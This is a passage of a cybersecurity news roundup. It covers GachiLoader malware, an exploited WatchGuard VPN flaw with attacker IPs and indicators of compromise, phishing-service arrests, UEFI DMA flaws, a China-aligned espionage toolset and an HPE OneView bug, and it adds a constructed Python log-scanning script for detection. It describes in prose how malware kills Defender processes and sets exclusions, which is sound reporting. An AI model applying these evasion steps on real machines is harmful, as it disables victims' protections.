These videos were uploaded from 39 compromised accounts, with the first video dating back to December 22, 2024. A majority of these videos have since been taken down by Google. In at least one case, GachiLoader has served as a conduit for the Rhadamanthys information stealer malware. Like other loaders, GachiLoader is used to deploy additional payloads to an infected machine, while simultaneously performing a series of anti-analysis checks to fly under the radar.

It also verifies if it’s running in an elevated context by executing the “net session” command. In the event the execution fails, it attempts to start itself with admin privileges, which, in turn, triggers a User Account Control (UAC) prompt. There are high chances that the victim will allow it to continue, as the malware is likely to be distributed through fake installers for popular software, as outlined in the case of CountLoader. In the last phase, the malware attempts to kill “SecHealthUI.exe,” a process associated with Microsoft Defender, and configures Defender exclusions to prevent the security solution from flagging malicious payloads staged in certain folders (e.g., C:\Users\, C:\ProgramData\, and C:\Windows).

GachiLoader then proceeds to either directly fetch the final payload from a remote URL or employ another loader named “kidkadi.node,” which then loads the main malware by abusing Vectored Exception Handling. “The threat actor behind GachiLoader demonstrated proficiency with Windows internals, coming up with a new variation of a known technique,” Check Point said. “This highlights the need for security researchers to stay up-to-date with malware techniques such as PE injections and to proactively look for new ways in which malware authors try to evade detection.”

WatchGuard Warns of Active Exploitation of Critical Fireware OS VPN Vulnerability

WatchGuard has released fixes to address a critical security flaw in Fireware OS that it said has been exploited in real-world attacks. Tracked as CVE-2025-14733 (CVSS score: 9.3), the vulnerability has been described as a case of out-of-bounds write affecting the iked process that could allow a remote unauthenticated attacker to execute arbitrary code. “This vulnerability affects both the mobile user VPN with IKEv2 and the branch office VPN using IKEv2 when configured with a dynamic gateway peer,” the company said in a Thursday advisory. “If the Firebox was previously configured with the mobile user VPN with IKEv2 or a branch office VPN using IKEv2 to a dynamic gateway peer, and both of those configurations have since been deleted, that Firebox may still be vulnerable if a branch office VPN to a static gateway peer is still configured.” The vulnerability impacts the following versions of Fireware OS -

- 2025.1 - Fixed in 2025.1.4
- 12.x - Fixed in 12.11.6
- 12.5.x (T15 & T35 models) - Fixed in 12.5.15
- 12.3.1 (FIPS-certified release) - Fixed in 12.3.1_Update4 (B728352)
- 11.x (11.10.2 up to and including 11.12.4_Update1) - End-of-Life

WatchGuard acknowledged that it has observed threat actors actively attempting to exploit this vulnerability in the wild, with the attacks originating from the following IP addresses -

- 45.95.19[.]50
- 51.15.17[.]89
- 172.93.107[.]67
- 199.247.7[.]82

Interestingly, the IP address “199.247.7[.]82” was also flagged by Arctic Wolf earlier this week as linked to the exploitation of two recently disclosed security vulnerabilities in Fortinet FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager (CVE-2025-59718 and CVE-2025-59719, CVSS scores: 9.8).

The Seattle-based company has also shared multiple indicators of compromise (IoCs) that device owners can use to determine if their own instances have been infected -

- A log message stating “Received peer certificate chain is longer than 8. Reject this certificate chain” when the Firebox receives an IKE2 Auth payload with more than 8 certificates
- An IKE_AUTH request log message with an abnormally large CERT payload size (greater than 2000 bytes)
- During a successful exploit, the iked process will hang, interrupting VPN connections
- After a failed or successful exploit, the IKED process will crash and generate a fault report on the Firebox

The disclosure comes a little over a month after the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added another critical WatchGuard Fireware OS flaw (CVE-2025-9242, CVSS score: 9.3) to its Known Exploited Vulnerabilities (KEV) catalog after reports of active exploitation. It’s currently not known if these two sets of attacks are related.
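As an added example, not code from WatchGuard’s advisory, the Python below applies the log-based indicators above to syslog-style Firebox lines: the literal certificate-chain rejection message, an IKE_AUTH entry whose CERT payload exceeds 2000 bytes, and an iked fault report, correlating any peer IP it finds with the source addresses the advisory names. The advisory does not give a log format, so the line layout, the CERT-size regex and every sample line are constructed for illustration and will need adjusting to real Firebox output.

```python
# Added example (not from WatchGuard's advisory): match Firebox iked log lines
# against the log-based IoCs. Line format and all sample lines are constructed.
import re

# Literal message quoted in the advisory for an IKE_AUTH carrying more than 8 certificates
CHAIN_TOO_LONG = "Received peer certificate chain is longer than 8. Reject this certificate chain"
# Constructed pattern for an IKE_AUTH entry that reports the CERT payload size;
# adjust to the exact wording your Firebox emits.
CERT_SIZE = re.compile(r"IKE_AUTH request.*?CERT payload.*?(\d+)\s*bytes", re.IGNORECASE)
CERT_SIZE_LIMIT = 2000  # advisory: a CERT payload larger than 2000 bytes is abnormal
PEER_IP = re.compile(r"\bfrom (\d{1,3}(?:\.\d{1,3}){3})\b")

# Source IPs named in the advisory, kept in the defanged form the advisory uses.
KNOWN_ATTACK_SOURCES = {"45.95.19[.]50", "51.15.17[.]89", "172.93.107[.]67", "199.247.7[.]82"}

# Constructed sample lines (not real Firebox output): a benign IKE_AUTH, an oversized
# CERT payload, the rejection message, an iked fault report, and unrelated noise.
SAMPLE_LOG = [
    "2025-12-18T10:02:11 fw01 iked[1234]: IKE_AUTH request from 203.0.113.7: CERT payload size 512 bytes",
    "2025-12-18T10:05:43 fw01 iked[1234]: IKE_AUTH request from 198.51.100.9: CERT payload size 4096 bytes",
    "2025-12-18T10:05:43 fw01 iked[1234]: Received peer certificate chain is longer than 8. Reject this certificate chain",
    "2025-12-18T10:05:44 fw01 iked[1234]: iked fault report generated, process restarting",
    "2025-12-18T10:06:00 fw01 sshd[77]: Accepted publickey for admin from 192.0.2.10",
]


def classify_line(line: str):
    """Return (indicator, detail) if the line matches an advisory IoC, else None."""
    if CHAIN_TOO_LONG in line:
        return ("cert_chain_gt_8", CHAIN_TOO_LONG)
    m = CERT_SIZE.search(line)
    if m and int(m.group(1)) > CERT_SIZE_LIMIT:
        return ("large_cert_payload", f"CERT payload {m.group(1)} bytes")
    lowered = line.lower()
    if "iked" in lowered and ("fault report" in lowered or "crash" in lowered):
        return ("iked_crash", "iked fault report / crash after an exploit attempt")
    return None


def refang(ip: str) -> str:
    """Turn the defanged 1.2.3[.]4 form into a comparable dotted quad."""
    return ip.replace("[.]", ".")


def scan(lines):
    """Collect hits with the peer IP (if the line names one) and whether it is a known source."""
    known = {refang(ip) for ip in KNOWN_ATTACK_SOURCES}
    hits = []
    for line in lines:
        result = classify_line(line)
        if result is None:
            continue
        indicator, detail = result
        peer_match = PEER_IP.search(line)
        peer = peer_match.group(1) if peer_match else None
        hits.append({
            "indicator": indicator,
            "detail": detail,
            "peer": peer,
            "known_source": peer is not None and peer in known,
        })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```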

Users are advised to apply the updates as soon as possible to secure against the threat. As temporary mitigation for devices with vulnerable Branch Office VPN (BOVPN) configurations, the company has urged administrators to disable dynamic peer BOVPNs, create an alias that includes the static IP addresses of remote BOVPN peers, add new firewall policies that allow access from the alias, and disable the default built-in policies that handle VPN traffic.

Nigeria Arrests RaccoonO365 Phishing Developer Linked to Microsoft 365 Attacks

Authorities in Nigeria have announced the arrest of three “high-profile internet fraud suspects” who are alleged to have been involved in phishing attacks targeting major corporations, including the main developer behind the RaccoonO365 phishing-as-a-service (PhaaS) scheme. The Nigeria Police Force National Cybercrime Centre (NPF–NCCC) said investigations conducted in collaboration with Microsoft and the Federal Bureau of Investigation (FBI) led to the identification of Okitipi Samuel, also known as Moses Felix, as the principal suspect and developer of the phishing infrastructure. “Investigations reveal that he operated a Telegram channel through which phishing links were sold in exchange for cryptocurrency and hosted fraudulent login portals on Cloudflare using stolen or fraudulently obtained email credentials,” the NPF said in a post shared on social media. In addition, laptops, mobile devices, and other digital equipment linked to the operation have been seized following search operations conducted at their residences.

The two other arrested individuals have no connection to the creation or operation of the PhaaS service, per the NPF. The arrests were carried out following raids in Lagos and Edo states. RaccoonO365 is the name assigned to a financially motivated threat group behind a PhaaS toolkit that enables bad actors to conduct credential harvesting attacks by serving phishing pages mimicking Microsoft 365 login pages. Microsoft is tracking the threat actor under the moniker Storm-2246.

Back in September 2025, the tech giant said it worked with Cloudflare to seize 338 domains used by RaccoonO365. The phishing infrastructure attributed to the toolkit is estimated to have led to the theft of at least 5,000 Microsoft credentials from 94 countries since July 2024. The NPF said RaccoonO365 was used to set up fraudulent Microsoft login portals aimed at stealing user credentials and using them to gain unlawful access to the email platforms of corporate, financial, and educational institutions. The joint probe has uncovered multiple incidents of unauthorized Microsoft 365 account access between January and September 2025 that originated from phishing messages crafted to mimic legitimate Microsoft authentication pages.

These activities led to business email compromise, data breaches, and financial losses across multiple jurisdictions, the NPF added. A civil lawsuit filed by Microsoft and Health-ISAC in September has accused defendants Joshua Ogundipe and four other John Does of hosting a cybercriminal operation by “selling, distributing, purchasing, and implementing” the phishing kit to facilitate sophisticated spear-phishing and siphon sensitive information. The stolen data is then used to fuel more cybercrimes, including business email compromise, financial fraud, and ransomware attacks, as well as commit intellectual property violations, the lawsuit alleged. The lawsuit also identified Ogundipe as the mastermind behind the operation.

His present whereabouts are unclear. When reached for comment, a Microsoft spokesperson told The Hacker News that investigations are ongoing. The development comes as Google filed a lawsuit against the operators of the Darcula PhaaS service, naming Chinese national Yucheng Chang as the group’s leader along with 24 other members. The company is seeking a court order to seize the group’s server infrastructure that has been behind a massive smishing wave impersonating U.S. government entities. Darcula and associates are estimated to have stolen nearly 900,000 credit card numbers, including nearly 40,000 from Americans, according to an investigation from the Norwegian Broadcasting Corporation (NRK) and cybersecurity company Mnemonic. The Chinese-language phishing kit first emerged in July 2023. News of the lawsuit was first reported by NBC News on December 17, 2025.

The development comes a little over a month after Google also sued China-based hackers associated with another PhaaS service known as Lighthouse that’s believed to have impacted over 1 million users across 120 countries.

New UEFI Flaw Enables Early-Boot DMA Attacks on ASRock, ASUS, GIGABYTE, MSI Motherboards

Certain motherboard models from vendors like ASRock, ASUSTeK Computer, GIGABYTE, and MSI are affected by a security vulnerability that leaves them susceptible to early-boot direct memory access (DMA) attacks across architectures that implement a Unified Extensible Firmware Interface (UEFI) and input–output memory management unit (IOMMU). UEFI and IOMMU are designed to enforce a security foundation and prevent peripherals from performing unauthorized memory accesses, effectively ensuring that DMA-capable devices cannot manipulate or inspect system memory before the operating system is loaded. The vulnerability, discovered by Nick Peterson and Mohamed Al-Sharifi of Riot Games in certain UEFI implementations, has to do with a discrepancy in the DMA protection status. While the firmware indicates that DMA protection is active, it fails to configure and enable the IOMMU during the critical boot phase.

“This gap allows a malicious DMA-capable Peripheral Component Interconnect Express (PCIe) device with physical access to read or modify system memory before operating system-level safeguards are established,” the CERT Coordination Center (CERT/CC) said in an advisory. “As a result, attackers could potentially access sensitive data in memory or influence the initial state of the system, thus undermining the integrity of the boot process.” Successful exploitation of the vulnerability could allow a physically present attacker to enable pre-boot code injection on affected systems running unpatched firmware and access or alter system memory via DMA transactions, well before the operating system kernel and its security features are loaded. The vulnerabilities that enable a bypass of early-boot memory protection are listed below -

- CVE-2025-14304 (CVSS score: 7.0) - A protection mechanism failure vulnerability affecting ASRock, ASRock Rack, and ASRock Industrial motherboards using Intel 500, 600, 700, and 800 series chipsets
- CVE-2025-11901 (CVSS score: 7.0) - A protection mechanism failure vulnerability affecting ASUS motherboards using Intel Z490, W480, B460, H410, Z590, B560, H510, Z690, B660, W680, Z790, B760, and W790 series chipsets
- CVE-2025-14302 (CVSS score: 7.0) - A protection mechanism failure vulnerability affecting GIGABYTE motherboards using Intel Z890, W880, Q870, B860, H810, Z790, B760, Z690, Q670, B660, H610, W790 series chipsets, and AMD X870E, X870, B850, B840, X670, B650, A620, A620A, and TRX50 series chipsets (Fix for TRX50 planned for Q1 2026)
- CVE-2025-14303 (CVSS score: 7.0) - A protection mechanism failure vulnerability affecting MSI motherboards using Intel 600 and 700 series chipsets

With impacted vendors releasing firmware updates to correct the IOMMU initialization sequence and enforce DMA protections throughout the boot process, it’s essential that end users and administrators apply them as soon as they are available to stay protected against the threat. “In environments where physical access cannot be fully controlled or relied on, prompt patching and adherence to hardware security best practices are especially important,” CERT/CC said.

“Because the IOMMU also plays a foundational role in isolation and trust delegation in virtualized and cloud environments, this flaw highlights the importance of ensuring correct firmware configuration even on systems not typically used in data centers.”

Update

Riot Games, in a separate post, said the critical flaw could be exploited for injecting code, adding how the privileged state associated with the early boot sequence can be manipulated before the operating system running on the machine can activate its security controls. “This issue allowed hardware cheats to potentially inject code unnoticed, even when security settings on the host appeared to be enabled,” Al-Sharifi said, describing it as a “Sleeping Bouncer” problem. While Pre-Boot DMA Protection is designed as a way to prevent rogue DMA access to a system’s memory using IOMMU early on in the boot sequence, the vulnerability stems from the firmware incorrectly signaling to the operating system that this feature was fully active, when it was failing to initialize the IOMMU correctly during early boot. “This meant that while ‘Pre-Boot DMA Protection’ settings appeared to be enabled in the BIOS, the underlying hardware implementation wasn’t fully initializing the IOMMU during the earliest seconds of the boot process,” Al-Sharifi added.

“In essence, the system’s ‘bouncer’ appeared to be on duty, but was actually asleep in the chair. So by the time the system is fully loaded, it can’t be 100% confident that zero integrity-breaking code was injected via DMA.” This brief exploitation window can pave the way for a “sophisticated hardware cheat” to get in, gain elevated privileges, and conceal itself without raising any red flags. “By closing this pre-boot loophole, we are neutralizing an entire class of previously untouchable cheats and significantly raising the cost of unfair play,” Riot Games noted. Although the vulnerability has been framed from the point of view of the gaming sector, the security risk extends to any attack that can abuse the physical access to inject malicious code.


China-Aligned Threat Group Uses Windows Group Policy to Deploy Espionage Malware

A previously undocumented China-aligned threat cluster dubbed LongNosedGoblin has been attributed to a series of cyber attacks targeting governmental entities in Southeast Asia and Japan. The end goal of these attacks is cyber espionage, Slovak cybersecurity company ESET said in a report published today. The threat activity cluster has been assessed to be active since at least September 2023. “LongNosedGoblin uses Group Policy to deploy malware across the compromised network, and cloud services (e.g., Microsoft OneDrive and Google Drive) as command and control (C&C) servers,” security researchers Anton Cherepanov and Peter Strýček said.

Group Policy is a mechanism for managing settings and permissions on Windows machines. According to Microsoft, Group Policy can be used to define configurations for groups of users and client computers, as well as manage server computers. The attacks are characterized by the use of a varied custom toolset that mainly consists of C#/.NET applications -

- NosyHistorian, to collect browser history from Google Chrome, Microsoft Edge, and Mozilla Firefox
- NosyDoor, a backdoor that uses Microsoft OneDrive as C&C and executes commands that allow it to exfiltrate files, delete files, and execute shell commands
- NosyStealer, to exfiltrate browser data from Google Chrome and Microsoft Edge to Google Drive in the form of an encrypted TAR archive
- NosyDownloader, to download and run a payload in memory, such as NosyLogger
- NosyLogger, a modified version of DuckSharp that’s used to log keystrokes

Figure: NosyDoor execution chain

ESET said it first detected activity associated with the hacking group in February 2024 on a system of a governmental entity in Southeast Asia, eventually finding that Group Policy was used to deliver the malware to multiple systems from the same organization. The exact initial access methods used in the attacks are presently unknown.

“In most cases we investigated, the attackers were already inside the network, so we could not determine the initial access method they used,” Cherepanov, a senior malware researcher at ESET, told The Hacker News. Further analysis has determined that while many victims were affected by NosyHistorian between January and March 2024, only a subset of these victims were infected with NosyDoor, indicating a more targeted approach. In some cases, the dropper used to deploy the backdoor using AppDomainManager injection has been found to contain “execution guardrails” that are designed to limit operation to specific victims’ machines. Also employed by LongNosedGoblin are other tools like a reverse SOCKS5 proxy, a utility that’s used to run a video recorder to capture audio and video, and a Cobalt Strike loader.

The cybersecurity company noted that the threat actor’s tradecraft shares tenuous overlaps with clusters tracked as ToddyCat and Erudite Mogwai, but emphasized the lack of definitive evidence linking them together. That said, the similarities between NosyDoor and LuckyStrike Agent and the presence of the phrase “Paid Version” in the PDB path of LuckyStrike Agent have raised the possibility that the malware may be sold or licensed to other threat actors. “We later identified another instance of a NosyDoor variant targeting an organization in an E.U. country, once again employing different TTPs, and using the Yandex Disk cloud service as a C&C server,” the researchers noted.

“The use of this NosyDoor variant suggests that the malware may be shared among multiple China-aligned threat groups.”

HPE OneView Flaw Rated CVSS 10.0 Allows Unauthenticated Remote Code Execution

Hewlett Packard Enterprise (HPE) has resolved a maximum-severity security flaw in OneView Software that, if successfully exploited, could result in remote code execution. The critical vulnerability, assigned the CVE identifier CVE-2025-37164, carries a CVSS score of 10.0. HPE OneView is an IT infrastructure management software that streamlines IT operations and controls all systems via a centralized dashboard interface. “A potential security vulnerability has been identified in Hewlett Packard Enterprise OneView Software. This vulnerability could be exploited, allowing a remote unauthenticated user to perform remote code execution,” HPE said in an advisory issued this week. It affects all versions of the software prior to version 11.00, which addresses the flaw. The company has also made available a hotfix that can be applied to OneView versions 5.20 through 10.20. It’s worth noting that the hotfix must be reapplied after upgrading from version 6.60 or later to version 7.00.00, or after any HPE Synergy Composer reimaging operations.

Separate hotfixes are available for the OneView virtual appliance and Synergy Composer2. Although HPE makes no mention of the flaw being exploited in the wild, it’s essential that users apply the patches as soon as possible for optimal protection. Earlier this June, the company also released updates to fix eight vulnerabilities in its StoreOnce data backup and deduplication solution that could result in an authentication bypass and remote code execution. It also shipped OneView version 10.00 to remediate a number of known flaws in third-party components, such as Apache Tomcat and Apache HTTP Server.
